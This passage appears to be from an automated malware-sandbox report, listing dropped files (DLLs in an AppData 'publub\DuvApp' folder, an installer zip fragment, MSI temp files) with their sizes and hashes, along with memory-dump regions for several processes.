                            b7b148054a2818699d93f96139b4d0d0

                            SHA1

                            0a5187b37bd84c19a7d2d84f328fa0adbc75123c

                            SHA256

                            25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915

                            SHA512

                            4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libsqlite3-0.dll
                            Filesize

                            1.2MB

                            MD5

                            0381964390751461a5d79d26ca7cedaa

                            SHA1

                            3b17b9dca5060f9b22920737165a6bd1de5e8941

                            SHA256

                            7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da

                            SHA512

                            381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\publub\DuvApp\zlib1.dll
                            Filesize

                            141KB

                            MD5

                            8f4cdaed2399204619310cd76fd11056

                            SHA1

                            0f06ef5acde4f1e99a12cfc8489c1163dba910d1

                            SHA256

                            df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213

                            SHA512

                            3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

                            Download Submit

                          • C:\Users\Admin\Downloads\x64__x32__installer.meHXDgAp.zip.part
                            Filesize

                            6KB

                            MD5

                            c26a7ba9eda936069792543ef3a022b3

                            SHA1

                            ac058fd4ace3012ee75291dfe7c39005b1327050

                            SHA256

                            7b7f8fae091bd8c4833e49d087b94dca324a76592ff0223e31cdc3846af0d7fa

                            SHA512

                            6e71c4c9fa4c76e79172d7959b2fc04a204a875f52f9d4bbbaffc2e74a1dcdc3f27e324430569af3da0b04431696b8dacde052a62cae1a381c51527f8fdc2ea7

                            Download Submit

                          • C:\Windows\Installer\MSI2608.tmp
                            Filesize

                            738KB

                            MD5

                            b158d8d605571ea47a238df5ab43dfaa

                            SHA1

                            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

                            SHA256

                            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

                            SHA512

                            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

                            Download Submit

                          • C:\Windows\Installer\MSI2774.tmp
                            Filesize

                            758KB

                            MD5

                            fb4665320c9da54598321c59cc5ed623

                            SHA1

                            89e87b3cc569edd26b5805244cfacb2f9c892bc7

                            SHA256

                            9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59

                            SHA512

                            b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

                            Download Submit

                          • C:\Windows\Installer\e5a25d9.msi
                            Filesize

                            8.4MB

                            MD5

                            7d0e7e9083315bddec9bbc60fbf30ba3

                            SHA1

                            008eb06db4a300ae988ea004503382bec53f0743

                            SHA256

                            572e7f82c29a2be6f927cb28c1125eb4f7e62f0d5e82e8489706a64e8e8302e2

                            SHA512

                            8678ee4b95226e57d4ed867a3cec5827b01389e4542dccab48e11b10b14966117c698c4bd4e02ed752fb8383459a12b1d6cde3a6fdbe9bb87f4005ae72cab0bc

                            Download Submit

                          • memory/1288-2378-0x000001F95A6A0000-0x000001F95A862000-memory.dmp

                            Filesize

                            1.8MB

                            Download

                          • memory/1288-2353-0x000001F95A0C0000-0x000001F95A0DC000-memory.dmp

                            Filesize

                            112KB

                            Download

                          • memory/1288-2379-0x000001F95ADA0000-0x000001F95B2C8000-memory.dmp

                            Filesize

                            5.2MB

                            Download

                          • memory/1288-2346-0x000001F959D70000-0x000001F959D92000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/1848-2329-0x0000000000300000-0x0000000000328000-memory.dmp

                            Filesize

                            160KB

                            Download

                          • memory/1848-2330-0x0000000000300000-0x0000000000328000-memory.dmp

                            Filesize

                            160KB

                            Download

                          • memory/1848-2352-0x0000000000300000-0x0000000000328000-memory.dmp

                            Filesize

                            160KB

                            Download

                          • memory/1848-2339-0x0000000000300000-0x0000000000328000-memory.dmp

                            Filesize

                            160KB

                            Download

                          • memory/1984-2328-0x00000000007E0000-0x0000000000805000-memory.dmp

                            Filesize

                            148KB

                            Download

                          • memory/1984-2332-0x0000000065A80000-0x0000000065AAA000-memory.dmp

                            Filesize

                            168KB

                            Download

                          • memory/1984-2333-0x000000006B480000-0x000000006B4C1000-memory.dmp

                            Filesize

                            260KB

                            Download

                          • memory/1984-2334-0x0000000066580000-0x00000000666AA000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/1984-2335-0x0000000063080000-0x00000000630A9000-memory.dmp

                            Filesize

                            164KB

                            Download

                          • memory/1984-2331-0x0000000000400000-0x000000000054C000-memory.dmp

                            Filesize

                            1.3MB

                            Download

                          • memory/1984-2336-0x000000006A800000-0x000000006A80F000-memory.dmp

                            Filesize

                            60KB

                            Download

                          • memory/4044-2220-0x00000000066F0000-0x000000000670E000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/4044-2227-0x00000000086E0000-0x0000000008C84000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/4044-2230-0x0000000009390000-0x00000000098BC000-memory.dmp

                            Filesize

                            5.2MB

                            Download

                          • memory/4044-2223-0x0000000008060000-0x00000000086DA000-memory.dmp

                            Filesize

                            6.5MB

                            Download

                          • memory/4044-2226-0x0000000006CE0000-0x0000000006D02000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/4044-2225-0x00000000076F0000-0x0000000007786000-memory.dmp

                            Filesize

                            600KB

                            Download

                          • memory/4044-2224-0x0000000006C50000-0x0000000006C6A000-memory.dmp

                            Filesize

                            104KB

                            Download

                          • memory/4044-2219-0x0000000006260000-0x00000000065B4000-memory.dmp

                            Filesize

                            3.3MB

                            Download

                          • memory/4044-2221-0x0000000006730000-0x000000000677C000-memory.dmp

                            Filesize

                            304KB

                            Download

                          • memory/4044-2209-0x0000000006090000-0x00000000060F6000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/4044-2208-0x00000000059F0000-0x0000000005A56000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/4044-2229-0x0000000008C90000-0x0000000008E52000-memory.dmp

                            Filesize

                            1.8MB

                            Download

                          • memory/4044-2207-0x0000000005750000-0x0000000005772000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/4044-2206-0x0000000005A60000-0x0000000006088000-memory.dmp

                            Filesize

                            6.2MB

                            Download

                          • memory/4044-2205-0x0000000003110000-0x0000000003146000-memory.dmp

                            Filesize

                            216KB

                            Download